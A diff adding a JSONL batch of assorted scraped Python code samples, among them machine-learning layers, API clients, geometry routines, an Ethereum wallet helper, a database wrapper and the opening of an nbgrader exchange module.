diff --git "a/6360.jsonl" "b/6360.jsonl" new file mode 100644--- /dev/null +++ "b/6360.jsonl" @@ -0,0 +1,683 @@ +{"seq_id":"199273296","text":"\"\"\"\nData: 2021/05/10\nAuthor: worith\nDescription: dataset\n\"\"\"\nimport torch\nimport numpy as np\nimport pandas as pd\nimport torch.utils.data as data\nfrom utils.utils import cut_str\nfrom config.config import global_config\n\n\nclass PDDataset(data.Dataset):\n def __init__(self, split_class, data):\n self.data = data\n\n if split_class == '2':\n self.in_feat = self.data.iloc[:, 0:5].columns.tolist()\n\n self.hidden_feat = self.data.iloc[:, 6:].columns.tolist()\n else:\n self.in_feat = self.data.iloc[:, 0:13].columns.tolist()\n self.hidden_feat = self.data.iloc[:, 14:].columns.tolist()\n\n self.out_feat = ['NPV']\n\n # if normalize:\n\n # self.data = self.data.apply(lambda x: (x - np.mean(x)) / (np.var(x) ))\n\n def __getitem__(self, index):\n x = torch.from_numpy(self.data.iloc[index, :][self.in_feat].values).float()\n\n h = torch.from_numpy(self.data.iloc[index, :][self.hidden_feat].values).float()\n\n y = torch.from_numpy(self.data.iloc[index, :][self.out_feat].values).float()\n\n x = torch.cat((x, h))\n return x, h, y\n\n def __len__(self):\n return self.data.shape[0]\n\n\n\n\n","sub_path":"dataset/fracture_dataset.py","file_name":"fracture_dataset.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"452167219","text":"import json\nimport logging\nimport os\nimport re\n\nimport requests\n\n\nLOG = logging.getLogger(__name__)\nRE_BASENAME = re.compile(r'href=\".+/([^/#]+)\\.(tar\\.gz|whl)#', re.IGNORECASE)\nRE_VERSION = re.compile(r\"^((\\d+)((\\.(\\d+))+)((a|b|c|rc)(\\d+))?(\\.(dev|post)(\\d+))?).*$\")\n\n\nclass PepVersion(object):\n \"\"\"\n Parse versions according to PEP-0440, ordering for non pre-releases is well supported\n Pre-releases are partially supported, no complex combinations (such as .post.dev) are paid attention to\n \"\"\"\n\n components = None\n prerelease = None\n\n def __init__(self, text):\n self.text = text\n m = RE_VERSION.match(text)\n if not m:\n return\n\n self.text, major, main_part, pre, pre_num, rel, rel_num = m.group(1, 2, 3, 7, 8, 10, 11)\n components = (major + main_part).split(\".\")\n if len(components) > 3:\n return # Invalid version\n\n while len(components) < 3:\n components.append(0)\n\n components.append(rel_num if rel == \"post\" else 0) # Using imaginary 4th component to hold post-release\n self.components = tuple(map(int, components))\n if pre:\n self.prerelease = (\"c\" if pre == \"rc\" else pre, int(pre_num))\n\n if rel == \"dev\":\n self.prerelease = (\"dev\", int(rel_num))\n\n def __repr__(self):\n return self.text\n\n def __hash__(self):\n return hash(self.text)\n\n def __eq__(self, other):\n return isinstance(other, PepVersion) and self.components == other.components and self.prerelease == other.prerelease\n\n def __lt__(self, other):\n if isinstance(other, PepVersion):\n if self.components == other.components:\n if self.prerelease:\n return other.prerelease and self.prerelease < other.prerelease\n\n return bool(other.prerelease)\n\n return self.components < other.components\n\n\ndef request_get(url):\n try:\n r = requests.get(url, timeout=30)\n return r.text if r.status_code != 404 else \"does not exist\"\n\n except IOError:\n return None\n\n\nclass PypiInfo(object):\n\n latest = None # type: str\n\n def __init__(self, index, pspec, include_prereleases=False):\n \"\"\"\n Args:\n index (str | 
None): URL to pypi index to use (default: pypi.org)\n pspec (pickley.PackageSpec): Pypi package name to lookup\n include_prereleases (bool): If True, include latest pre-release\n \"\"\"\n self.index = index or pspec.cfg.default_index\n self.pspec = pspec\n self.problem = None\n if \"{name}\" in self.index:\n self.url = self.index.format(name=self.pspec.dashed)\n\n else:\n # Assume legacy only for now for custom pypi indices\n self.url = \"%s/\" % os.path.join(self.index, self.pspec.dashed)\n\n data = request_get(self.url)\n if not data:\n self.problem = \"no data for %s, check your connection\" % self.url\n return\n\n if data[0] == \"{\": # See https://warehouse.pypa.io/api-reference/json/\n try:\n data = json.loads(data)\n self.latest = data.get(\"info\", {}).get(\"version\")\n\n except Exception as e:\n LOG.warning(\"Failed to parse pypi json from %s: %s\\n%s\", self.url, e, data)\n self.problem = \"invalid json received from %s\" % self.index\n\n return\n\n # Parse legacy pypi HTML\n lines = data.strip().splitlines()\n if not lines or \"does not exist\" in lines[0]:\n self.problem = \"does not exist on %s\" % self.index\n return\n\n releases = set()\n prereleases = set()\n for line in lines:\n m = RE_BASENAME.search(line)\n if m:\n version = PepVersion(self.version_part(m.group(1)))\n if version.components:\n if version.prerelease:\n prereleases.add(version)\n\n else:\n releases.add(version)\n\n if include_prereleases or not releases:\n releases = releases | prereleases\n\n if releases:\n releases = sorted(releases)\n self.latest = releases[-1].text\n return\n\n self.problem = \"no versions published on %s\" % self.index\n\n def __repr__(self):\n return \"%s %s\" % (self.pspec, self.latest)\n\n def _version_part(self, filename):\n if filename:\n filename = filename.lower()\n n = len(self.pspec.wheelified) + 1\n if filename.startswith(\"%s-\" % self.pspec.wheelified.lower()):\n return filename[n:]\n\n n = len(self.pspec.dashed) + 1\n if filename.startswith(\"%s-\" % self.pspec.dashed):\n return filename[n:]\n\n n = len(self.pspec.original) + 1\n if filename.startswith(\"%s-\" % self.pspec.original.lower()):\n return filename[n:]\n\n def version_part(self, filename):\n \"\"\"\n Args:\n filename (str): Filename to examine\n\n Returns:\n (str | None): Version extracted from `filename`, if applicable to current package spec\n \"\"\"\n vp = self._version_part(filename)\n if vp and vp[0].isdigit():\n return vp\n","sub_path":"src/pickley/pypi.py","file_name":"pypi.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"179947398","text":"# importing external libraries\nfrom datetime import datetime\nimport os\nimport pytz\nimport requests\nimport math\n\n\n# api urls as variables\nAPI_URL = ('http://api.openweathermap.org/data/2.5/weather?q={}&appid={}')\nAREA_URL = (\n 'http://api.openweathermap.org/data/2.5/box/city?bbox={},{},{},{},{}&appid={}')\n\n\n# function to get api data by city\ndef query_api(key, city):\n try:\n print(API_URL.format(city, key))\n data = requests.get(API_URL.format(city, key)).json()\n except Exception as exc:\n print(exc)\n data = None\n return data\n\n\n# function to get api data by area\ndef query_api_area(key, lol, lab, lor, lat, z):\n try:\n print(AREA_URL.format(lol, lab, lor, lat, z, key))\n data = requests.get(AREA_URL.format(\n lol, lab, lor, lat, z, key)).json()\n except Exception as exc:\n print(exc)\n data = None\n return 
data\n","sub_path":"main_api.py","file_name":"main_api.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"118286903","text":"# -*- coding: UTF-8 -*-\n\ndef det(A):\n n = len(A)\n AM = A[:]\n\n for fd in range(n):\n if AM[fd][fd] == 0:\n AM[fd][fd] = 1.0e-18\n for i in range(fd+1, n):\n crScaler = AM[i][fd] / AM[fd][fd]\n for j in range(n):\n AM[i][j] = AM[i][j] - crScaler * AM[fd][j]\n\n product = 1.0\n for i in range(n):\n product *= AM[i][i]\n\n return product\n\ndef get_circle(a, b, c):\n vec = [a[0]**2 + a[1]**2, b[0]**2 + b[1]**2, c[0]**2 + c[1]**2]\n x_mat = [vec, [a[1], b[1], c[1]], [1]*3]\n y_mat = [vec, [a[0], b[0], c[0]], [1]*3]\n d_mat = [[a[0], b[0], c[0]], [a[1], b[1], c[1]], [1] * 3]\n d = 2 * det(d_mat)\n x = 1 / d * det(x_mat)\n y = -1 / d * det(y_mat)\n center = [x, y]\n r = norm([center[0]-a[0], center[1]-a[1]])\n return center, r\n\ndef get_circle_coords(center, r):\n circle = [[r, 180* phi/3.14159265] for phi in range(0, 180, 5)]\n circle = [pol2cart(p[0], p[1]) + (center[0], center[1]) for p in circle]\n return circle\n\ndef orientIfSure(px, py, rx, ry, qx, qy):\n l = (ry - py) * (qx - px)\n r = (rx - px) * (qy - py)\n if (abs(l - r) >= 3.3306690738754716*10**(-16) * abs(l + r)):\n return l - r\n else:\n return 0\n\ndef orient(rx, ry, qx, qy, px, py):\n return (orientIfSure(px, py, rx, ry, qx, qy) or orientIfSure(rx, ry, qx, qy, px, py) or orientIfSure(qx, qy, px, py, rx, ry)) < 0\n\ndef same_side(edge, p1, p2):\n x1, y1 = edge[0][0], edge[0][1]\n x2, y2 = edge[1][0], edge[1][1]\n ax, ay = p1[0], p1[1]\n bx, by = p2[0], p2[1]\n return orient(x1,y1, x2, y2, ax, ay) == orient(x1,y1, x2, y2, bx, by)\n\ndef get_distance(edge, center, r, candidate):\n p1, p2, p0 = edge[0], edge[1], center\n edge_len = norm([p2[0] - p1[0], p2[1] - p1[1]])\n sq = abs((p2[1]-p1[1])*p0[0] - (p2[0]-p1[0])*p0[1] + p2[0]*p1[1] - p2[1]*p1[0])\n dist = sq / edge_len\n if same_side(edge, center, candidate):\n return r + dist\n else:\n return r - dist\n\ndef point_in_arr(arr, point):\n for i in range(len(arr)):\n if arr[i][0] == point[0] and arr[i][1] == point[1]:\n return i\n return -1\n\ndef get_third_point(edge, triangles):\n for triangle in triangles:\n i1, i2 = point_in_arr(triangle, edge[0]), point_in_arr(triangle, edge[1])\n if not (i1 == -1 or i2 == -1):\n for i in range(len(triangle)):\n if not (i1 == i or i2 == i):\n return triangle[i]\n return None\n\ndef get_mate(edge, points, triangles):\n best_point, best_dist = None, None\n third = get_third_point(edge, triangles)\n for point in points:\n if point_in_arr(edge, point) > -1:\n continue\n if third is not None and same_side(edge, point, third):\n continue\n center, r = get_circle(edge[0], edge[1], point)\n dist = get_distance(edge, center, r, point)\n if best_point is None or dist < best_dist:\n best_point, best_dist = point, dist\n return best_point\n\ndef edge_in_frontier(frontier, edge):\n if len(frontier) == 0:\n return None\n for frontier_edge in frontier:\n if frontier_edge == edge:\n return frontier_edge\n flipped = [frontier_edge[1], frontier_edge[0]]\n if flipped == edge:\n return frontier_edge\n return None\n\ndef remove_edge_from_frontier(frontier, edge):\n for i in range(len(frontier)):\n if frontier[i] == edge:\n frontier.remove(edge)\n break\n return frontier\n\ndef update_frontier(frontier, point, used_edge):\n edge1 = [used_edge[0], point]\n edge2 = [used_edge[1], point]\n used_edge = edge_in_frontier(frontier, used_edge)\n 
fr_edge1 = edge_in_frontier(frontier, edge1)\n    fr_edge2 = edge_in_frontier(frontier, edge2)\n    if used_edge is not None:\n        frontier = remove_edge_from_frontier(frontier, used_edge)\n    if fr_edge1 is not None:\n        frontier = remove_edge_from_frontier(frontier, fr_edge1)\n    else:\n        frontier.append(edge1)\n    if fr_edge2 is not None:\n        frontier = remove_edge_from_frontier(frontier, fr_edge2)\n    else:\n        frontier.append(edge2)\n    return frontier\n\nfrom math import sqrt, atan2  # needed by cart2pol and norm below\n\ndef cart2pol(x, y):\n    r = sqrt(x**2 + y**2)\n    angle = atan2(y, x)\n    return(r, angle)\n\ndef norm(vector):\n    t = 0\n    for i in vector:\n        t = t+i*i\n    return sqrt(t)\n\ndef hull_edge(points):\n    p1 = points[0]\n    for point in points:\n        if point[1] < p1[1]:\n            p1 = point\n    p2 = points[0]\n    min_angle = 3 * 3.14159265\n    for point in points:\n        if point == p1: continue\n        vector = [point[0]-p1[0], point[1]-p1[1] ]\n        angle = cart2pol(vector[0], vector[1])[1]\n        if angle < min_angle:\n            min_angle, p2 = angle, point\n        elif angle == min_angle and norm(vector) > norm([p2[0]-p1[0], p2[1]-p1[1]]):\n            p2 = point\n    return [p2, p1]\n\ndef delunay(points):\n    triangles = []\n    frontier = [hull_edge(points)]\n    while frontier:\n        edge, frontier = frontier[-1], frontier[:-1]\n        mate = get_mate(edge, points, triangles)\n        if mate is not None:\n            frontier = update_frontier(frontier, mate, edge)\n            triangle = [edge[0], edge[1], mate]\n            triangles.append(triangle)\n    return triangles\n","sub_path":"Pycessing/triangulation/delunayUsingHull.py","file_name":"delunayUsingHull.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"154809791","text":"class SparseArray:\n    def __init__(self, array):\n        self.array = array\n        self.non_zeros = {idx: item for idx, item in enumerate(self.array) if item != 0}\n\n    def __len__(self):\n        return len(self.array)\n\n    def __getitem__(self, idx):\n        try:\n            return self.array[idx]\n        except IndexError:\n            print(idx, 'is out of range.')\n        except TypeError:\n            print(idx, 'is not integers or slices.')\n\n    def __setitem__(self, idx, value):\n        try:\n            self.array[idx] = value\n        except IndexError as err:\n            print(err)\n        except TypeError as err:\n            print(err)\n\n    def append(self, value):\n        if isinstance(value, int):\n            self.array.append(value)\n        self.non_zeros = {idx: item for idx, item in enumerate(self.array) if item != 0}\n\n    def __delitem__(self, idx):\n        try:\n            del self.array[idx]\n        except TypeError as err:\n            print(err)\n\n\nif __name__ == '__main__':\n    sa = SparseArray([1,2,0,0,0,0,3,0,0,4])\n    print('there are', len(sa), 'items')\n    print('\\nindexing:',sa[6], '\\n')\n    print(sa.array, '\\n')\n    print('slicing:', sa[1:9])\n    print(sa[34])","sub_path":"students/tri_nguyen/lesson08/SparseArray_class.py","file_name":"SparseArray_class.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"256735104","text":"import fileinput\nN = None\ncount = 0\nfor line in fileinput.input():\n    if count == 0:\n        N = int(line)\n    else:\n        line = line.strip()\n        print(line[0::2] + \" \" + line[1::2])\n    count += 1","sub_path":"Day6_review.py","file_name":"Day6_review.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"582377475","text":"class Solution:\n\n    def is_possible(self, max_weight):\n\n        total_weight = 0\n        total_days = 1\n\n        for weight in self.weights:\n\n            if total_weight + weight > max_weight:\n                total_weight = weight\n                total_days += 1\n\n            else:\n                
total_weight += weight\n\n return total_days <= self.days\n\n def shipWithinDays(self, weights: List[int], days: int) -> int:\n\n self.weights = weights\n self.days = days\n min_possible_weight = max(weights)\n max_possible_weight = sum(weights)\n\n left = min_possible_weight\n right = max_possible_weight\n\n while left < right:\n\n mid = (left + right) // 2\n\n if self.is_possible(mid):\n right = mid\n\n else:\n left = mid + 1\n\n return left\n","sub_path":"1011_Capacity_To_Ship_Packages_Within_D_Days.py","file_name":"1011_Capacity_To_Ship_Packages_Within_D_Days.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"100043221","text":"import torch\nimport torch.nn as nn\n\nfrom .sublayers import SublayerConnection, LayerNorm\nfrom .utils import clones\n\n\nclass Encoder(nn.Module):\n \"Core encoder is a stack of N layers\"\n def __init__(self, layer, N):\n super(Encoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, x: torch.tensor, mask: torch.tensor):\n \"Pass the input (and mask) through each layer in turn.\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\n\nclass EncoderLayer(nn.Module):\n \"Encoder is made up of self-attn and feed forward (defined below)\"\n def __init__(self, size, self_attn, feed_forward, dropout):\n super(EncoderLayer, self).__init__()\n self.self_attn = self_attn\n self.feed_forward = feed_forward\n self.sublayer = clones(SublayerConnection(size, dropout), 2)\n self.size = size\n\n def forward(self, x: torch.tensor, mask: torch.tensor):\n \"Follow Figure 1 (left) for connections.\"\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[1](x, self.feed_forward)\n\n\nclass Decoder(nn.Module):\n \"Generic N layer decoder with masking.\"\n def __init__(self, layer, N):\n super(Decoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, x: torch.tensor, memory: torch.tensor, src_mask: torch.tensor, tgt_mask: torch.tensor):\n for layer in self.layers:\n x = layer(x, memory, src_mask, tgt_mask)\n return self.norm(x)\n\n\nclass DecoderLayer(nn.Module):\n \"Decoder is made of self-attn, src-attn, and feed forward (defined below)\"\n def __init__(self, size, self_attn, src_attn, feed_forward, dropout):\n super(DecoderLayer, self).__init__()\n self.size = size\n self.self_attn = self_attn\n self.src_attn = src_attn\n self.feed_forward = feed_forward\n self.sublayer = clones(SublayerConnection(size, dropout), 3)\n\n def forward(self, x: torch.tensor, memory: torch.tensor, src_mask: torch.tensor, tgt_mask: torch.tensor):\n \"Follow Figure 1 (right) for connections.\"\n m = memory\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))\n x = self.sublayer[1](x, lambda x: self.src_attn(x, m, m, src_mask))\n return self.sublayer[2](x, self.feed_forward)","sub_path":"transformer/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"623222274","text":"from __future__ import division\nfrom config.utils.address import AddressUtil\nfrom web3 import Web3\nfrom config.common.exception import CommonError,Error_Messages\nimport json\nfrom config.common.utils import *\nfrom config.utils.transaction import TransactionUtil\n\nimport time \nclass EthUtil():\n def 
__init__(self,web3):\n        self.web3 = web3\n        self.address_util = AddressUtil()\n        self.transaction_util = TransactionUtil(self.web3)\n        self.decimals = 18\n    # get the ETH balance of an address\n    def getEtherBalance(self,raw_address):\n        address = self.address_util.toChecksumAddress(raw_address)\n        if not address:\n            return None\n        balance = to_ether(self.web3.eth.getBalance(address))\n        return balance\n    \n    # create a new account\n    def newAccount(self,password):\n        # password=\"bc502f8b-7823-49e7-bc5c-6f3d71bb50f9\"\n        ##print(\"password is {}\".format(password))\n        address = self.web3.personal.newAccount(password)\n        ##print(\"address is {}\".format(address))\n        return address\n\n    \n    # get the current block height\n    def get_block_height(self):\n        return self.web3.eth.blockNumber\n    \n    # convert to the smallest unit (wei)\n    def to_wei(self,raw_amount):\n        return Web3.toWei(raw_amount,'ether')\n    \n    # get the gas price\n    def get_gas_price(self):\n        return self.web3.eth.gasPrice()\n    \n    # get the amount of ether a transaction spent on fees\n    def get_transaction_fees(self,transaction_hash):\n        is_mined = self.is_mined(transaction_hash)\n        if not is_mined:\n            return is_mined\n        transaction_receipt = self.web3.eth.getTransactionReceipt(transaction_hash) \n        gas_used = transaction_receipt['gasUsed']\n        transaction = self.web3.eth.getTransaction(transaction_hash)\n        gas_price = transaction['gasPrice'] \n        fees = to_ether(gas_used*gas_price)\n        return fees\n\n    # get transaction details by transaction hash\n    def get_transaction_details(self,transaction_hash):\n        is_mined = self.is_mined(transaction_hash)\n        if not is_mined:\n            return is_mined\n        raw_transaction = self.web3.eth.getTransaction(transaction_hash)\n        # raw_transaction['fees'] = self.get_transaction_fees(transaction_hash)\n        tx_dict = dict(raw_transaction)\n        tx_json= json.dumps(tx_dict, cls=HexJsonEncoder)\n        raw_result = json.loads(tx_json)\n        raw_result['fees'] = self.get_transaction_fees(transaction_hash)\n        result = json.dumps(raw_result)\n        # transaction = Web3. 
toJson(raw_transaction)\n        ##print(\"result is {}\".format(result))\n        return str(result)\n    \n    # check whether the transaction has been mined (included in a block)\n    def is_mined(self,transaction_hash):\n        if not is_transaction_hash(transaction_hash):\n            return None\n        if self.web3.eth.getTransactionReceipt(transaction_hash):\n            return True\n        else:\n            return False\n\n    \n    \n    def transfer_ether(self,raw_address,password,to,raw_amount):\n        address = self.address_util.toChecksumAddress(raw_address)\n        from_balance = to_wei(self.getEtherBalance(raw_address))\n        amount = to_wei(raw_amount)\n        if from_balance 0.5:\r\n            idx = int(person_detections[0, 0, i, 1])\r\n\r\n            if CLASSES[idx] != \"person\":\r\n                continue\r\n\r\n            person_box = person_detections[0, 0, i, 3:7] * np.array([W, H, W, H])\r\n            (startX, startY, endX, endY) = person_box.astype(\"int\")\r\n\r\n            cv2.rectangle(image, (startX, startY), (endX, endY), (0, 0, 255), 2)\r\n\r\n    cv2.imshow(\"Results\", image)\r\n    cv2.waitKey(0)\r\n    cv2.destroyAllWindows()\r\n\r\nmain()\r\n\r\n\r\n\"\"\"\r\n\r\nSequence Wise Steps :\r\n\r\nSTEP 1: python person_detection-video.py\r\n\r\nSTEP 2: python person_tracking.py\r\n\r\nSTEP 3: python social_distancing.py\r\n\r\nSTEP 4: python dwell_time.py\r\n\r\nSTEP 5: python combine.py\r\n\r\n\r\n\"\"\"","sub_path":"python/person_detection-image.py","file_name":"person_detection-image.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"346668152","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n\"\"\" Database engine object and database connection context objects \"\"\"\nimport functools\nimport threading\nimport logging\nimport time\nimport uuid\nfrom _bsddb import DBError\n\nfrom sqlalchemy import create_engine\n\n__author__ = 'Devin -- http://zhangchuzhao.site'\n\n\nclass Dict(dict):\n    \"\"\"\n    Simple dict but support access as x.y style\n\n    >>> d1 = Dict()\n    >>> d1['x'] = 100\n    >>> d1.x\n    100\n    >>> d1.y = 200\n    >>> d1.y\n    200\n    >>> d2 = Dict(a='1', b='2', c='3')\n    >>> d2.c\n    '3'\n    >>> d2.empty\n    Traceback (most recent call last):\n    ...\n    AttributeError: 'Dict' object has no attribute 'empty'\n    >>> d3 = Dict(('a', 'b', 'c'), (1, 2, 3))\n    >>> d3.a\n    1\n    >>> d3.b\n    2\n    >>> d3.c\n    3\n    \"\"\"\n    def __init__(self, names=(), values=(), **kw):\n        super(Dict, self).__init__(**kw)\n        for k, v in zip(names, values):  # list[(tuple)...]\n            self[k] = v  # attributes are usable right after initialization\n\n    def __getattr__(self, item):\n        try:\n            return self[item]\n        except KeyError:\n            raise AttributeError(r\"'Dict' object has no attribute '%s'\" % item)\n\n    def __setattr__(self, key, value):\n        self[key] = value\n\n\ndef next_id(t=None):\n    \"\"\"\n    Return next id as 50-char string.\n    Args:\n        t: unix timestamp, default to None and using time.time()\n    \"\"\"\n    if t is None:\n        t = time.time()\n    return '%015d%s000' % (int(t * 1000), uuid.uuid4().hex)\n\n\n# log performance profiling info\ndef _profiling(start, sql=''):\n    t = time.time() - start\n    if t > 0.1:\n        logging.warning('[PROFILING] [DB] %s %s' % (t, sql))\n    else:\n        logging.info('[PROFILING] [DB] %s %s' % (t, sql))\n\n\n# database engine object\nclass _Engine(object):\n    def __init__(self, connect):\n        self._connect = connect\n\n    def connect(self):\n        return self._connect()\n\nengine = None\n\n\n# lazy database connection object\nclass _LasyConnection(object):\n    def __init__(self):\n        self.connection = None\n\n    def cursor(self):\n        if self.connection is None:\n            connection = engine.connect()\n            logging.info('open connection <%s>...' 
% hex(id(connection)))\n            self.connection = connection\n        return self.connection.cursor()\n\n    def commit(self):\n        self.connection.commit()\n\n    def rollback(self):\n        self.connection.rollback()\n\n    def cleanup(self):\n        if self.connection:\n            connection = self.connection\n            self.connection = None\n            logging.info('close connection <%s>...' % hex(id(connection)))\n\n\n# thread-local context that holds the database connection\nclass _DbCtx(threading.local):\n    def __init__(self):\n        self.connection = None\n        self.transactions = 0\n\n    def is_init(self):\n        return not self.connection is None\n\n    def init(self):\n        self.connection = _LasyConnection()\n        self.transactions = 0\n\n    def cleanup(self):\n        self.connection.cleanup()\n        self.connection = None\n\n    def cursor(self):\n        return self.connection.cursor()\n\n_db_ctx = _DbCtx()\n\n\n# connection context that automatically acquires and releases the connection\nclass _ConnectionCtx(object):\n    def __enter__(self):\n        global _db_ctx\n        self.should_cleanup = False\n        if not _db_ctx.is_init():\n            _db_ctx.init()\n            self.should_cleanup = True\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        global _db_ctx\n        if self.should_cleanup:\n            _db_ctx.cleanup()\n\n\ndef connection():\n    \"\"\"\n    :return: _ConnectionCtx object that can be used by 'with' statement:\n        with connection():\n            pass\n    \"\"\"\n    return _ConnectionCtx()\n\n\ndef with_connection(func):\n    \"\"\"\n    Decorator for reuse connection\n\n    @with_connection\n    def foo(*args, **kw):\n        f1()\n        f2()\n        f3()\n    \"\"\"\n    @functools.wraps(func)\n    def _wrapper(*args, **kw):\n        with _ConnectionCtx():\n            return func(*args, **kw)\n    return _wrapper\n\n\nclass _TransactionCtx(object):\n    \"\"\"\n    _TransactionCtx object that can handle transactions.\n\n    with _TransactionCtx():\n        pass\n    \"\"\"\n    def __enter__(self):\n        global _db_ctx\n        self.should_close_conn = False\n        if not _db_ctx.is_init():\n            _db_ctx.init()\n            self.should_close_conn = True\n        _db_ctx.transactions += 1\n        logging.info('begin transaction...' if _db_ctx.transactions == 1 else 'join current transactions')\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        global _db_ctx\n        _db_ctx.transactions -= 1\n        try:\n            if _db_ctx.transactions == 0:\n                if exc_type is None:\n                    self.commit()\n                else:\n                    self.rollback()\n        finally:\n            if self.should_close_conn:\n                _db_ctx.cleanup()\n\n    def commit(self):\n        global _db_ctx\n        logging.info('commit transaction...')\n        try:\n            _db_ctx.connection.commit()\n            logging.info('commit ok...')\n        except:\n            logging.warning('commit failed. 
try rollback...')\n            _db_ctx.connection.rollback()\n            logging.warning('rollback ok...')\n            raise\n\n    def rollback(self):\n        global _db_ctx\n        logging.warning('rollback transaction...')\n        _db_ctx.connection.rollback()\n        logging.info('rollback ok...')\n\n\ndef transaction():\n    \"\"\"\n    create a transaction object so can use with statement:\n    with transaction():\n        pass\n    \"\"\"\n    return _TransactionCtx()\n\n\ndef with_transaction(func):\n    \"\"\"\n    A decorator that wraps a function in a transaction\n    \"\"\"\n    @functools.wraps(func)\n    def _wrapper(*args, **kw):\n        _start = time.time()\n        try:\n            with _TransactionCtx():\n                return func(*args, **kw)\n        finally:\n            _profiling(_start)  # still runs after the return inside the with block\n    return _wrapper\n\n\ndef _select(sql, first, *args):\n    \"\"\"\n    Execute select SQL and return unique result or list results\n    :param sql: SQL query statement\n    :param first: whether to return only the first result\n    :param args: query parameters\n    :return: query result\n    \"\"\"\n    global _db_ctx\n    cursor = None\n    sql = sql.replace('?', '%s')\n    logging.info('SQL: %s, ARGS: %s' % (sql, args))\n    try:\n        cursor = _db_ctx.connection.cursor()\n        cursor.execute(sql, args)\n        if cursor.description:\n            names = [x[0] for x in cursor.description]\n        if first:\n            values = cursor.fetchone()\n            if not values:\n                return None\n            return Dict(names, values)\n        return [Dict(names, x) for x in cursor.fetchall()]\n    finally:\n        if cursor:\n            cursor.close()\n\n\n@with_connection\ndef select(sql, *args):\n    \"\"\"\n    Execute select SQL and return list or empty list if no result\n    :param sql: SQL query statement\n    :param args: query parameters\n    :return: result list\n    \"\"\"\n    return _select(sql, False, *args)\n\n\n@with_connection\ndef select_one(sql, *args):\n    \"\"\"\n    Execute select SQL expecting one result.\n    If no result found, return None.\n    If multiple results found, the first one is returned.\n    :param sql: SQL query statement\n    :param args: query parameters\n    :return: a single result\n    \"\"\"\n    return _select(sql, True, *args)\n\n\nclass MultiColumnsError(DBError):\n    \"\"\"\n    Custom exception class\n    \"\"\"\n    pass\n\n\n@with_connection\ndef select_int(sql, *args):\n    \"\"\"\n    Execute select SQL expecting one int column result\n    :param sql:\n    :param args:\n    :return:\n    \"\"\"\n    _d = _select(sql, True, *args)\n    if len(_d) != 1:\n        raise MultiColumnsError('Expect only one column.')\n    return _d.values()[0]\n\n\n@with_connection\ndef _update(sql, *args):\n    global _db_ctx\n    cursor = None\n    sql = sql.replace('?', '%s')\n    logging.info('SQL: %s, ARGS: %s' % (sql, args))\n    try:\n        cursor = _db_ctx.connection.cursor()\n        cursor.execute(sql, args)\n        r = cursor.rowcount\n        if _db_ctx.transactions == 0:\n            logging.info('auto commit')\n            _db_ctx.connection.commit()\n        return r\n    finally:\n        if cursor:\n            cursor.close()\n\n\ndef update(sql, *args):\n    \"\"\"\n    Execute update SQL\n    :param sql: update SQL statement\n    :param args: update parameters\n    :return: number of affected rows\n    \"\"\"\n    return _update(sql, *args)\n\n\ndef insert(table, **kwargs):\n    \"\"\"\n    Execute insert SQL\n    :param table: table to insert into\n    :param kwargs: data to insert\n    :return: number of affected rows\n    \"\"\"\n    cols, args = zip(*kwargs.iteritems())\n    sql = 'insert into `%s` (%s) values (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' 
for i in range(len(cols))]))\n    return _update(sql, *args)\n\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.DEBUG)\n    create_engine('root', 'root', 'test')\n    update('drop table if exists user')\n    update('create table user (id int primary key, name text, email text, passwd text, last_modified real)')\n    import doctest\n    doctest.testmod()","sub_path":"DevinBlog/www/transwarp/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":9102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"260105921","text":"#!/usr/bin/python\nimport os\nimport shutil\nfrom stat import S_IRUSR, S_IWUSR, S_IXUSR, S_IRGRP, S_IWGRP, S_IXGRP, \\\n    S_IROTH, S_IWOTH, S_IXOTH, S_ISGID, ST_MODE\n\nfrom traitlets import Bool\n\nfrom nbgrader.exchange.abc import ExchangeReleaseAssignment as ABCExchangeReleaseAssignment\nfrom nbgrader.exchange.ngshare import Exchange\n\n\nclass ExchangeReleaseAssignment(Exchange, ABCExchangeReleaseAssignment):\n\n    force = Bool(False,\n                 help='Force overwrite existing files in the exchange.'\n                 ).tag(config=True)\n\n    def _load_config(self, cfg, **kwargs):\n        if 'ExchangeRelease' in cfg:\n            self.log.warning('Use ExchangeReleaseAssignment in config, not ExchangeRelease. Outdated config:\\n%s',\n                             '\\n'.join('ExchangeRelease.{key} = {value!r}'.format(key=key, value=value) for (key, value) in\n                                       cfg.ExchangeRelease.items()))\n\n            cfg.ExchangeReleaseAssignment.merge(cfg.ExchangeRelease)\n            del 